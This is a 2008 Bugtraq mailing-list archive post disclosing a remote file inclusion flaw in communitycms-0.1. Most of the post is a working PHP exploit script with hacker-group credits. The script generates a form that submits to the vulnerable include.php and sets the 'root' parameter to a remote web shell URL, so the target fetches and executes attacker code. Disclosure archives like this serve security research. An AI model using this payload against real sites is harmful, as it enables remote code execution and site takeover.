lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20080717154647.31298.qmail@securityfocus.com>
Date: 17 Jul 2008 15:46:47 -0000
From: n3tr00t3r@...oo.com
To: bugtraq@...urityfocus.com
Subject: communitycms-0.1 Remote File Includion

<?php
/************************************************** ********************
*[+] << IN THE NAME OF GOD >>
*[+]
*[+]
*[+] [ Persian Boys Hacking Team ] -:- 2008 -:- IRAN
*[+] -
*[+] - discovered by N3TR00T3R [at] Y! [dot] com
*[+] - communitycms-0.1 Remote File Includion
*[+] - download :http://sourceforge.net/project/showf...roup_id=223968
*[+] - sp tnx : Sp3shial,Veroonic4,God_Master_hacker,a_reptil,Ciph 3r,shayan_cmd
*[+] r00t.master,Dr.root,Pouya_server,Spyn3t,LordKouros h,123qwe,mr.n4ser
*[+] Zahacker,goli_boya,i_reza_i,programer, and all irchatan members ...
*[+]
************************************************** ********************/
#if register_globals = On;

$shell="http://localhost/syn99.php?"; // your shell
$target="http://localhost/communitycms/include.php"; //vul page ---> include.php
echo"<html>
<body>
<form action=$target method=POST>
SECURITY :<input type=text name=security>
SHELL :<input type=text name=root>
<input type=hidden name=security value=1>
<input type=hidden name=root value=$shell>
<input type=submit value=ok>
</form>
</body>
</html>";
?> 

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ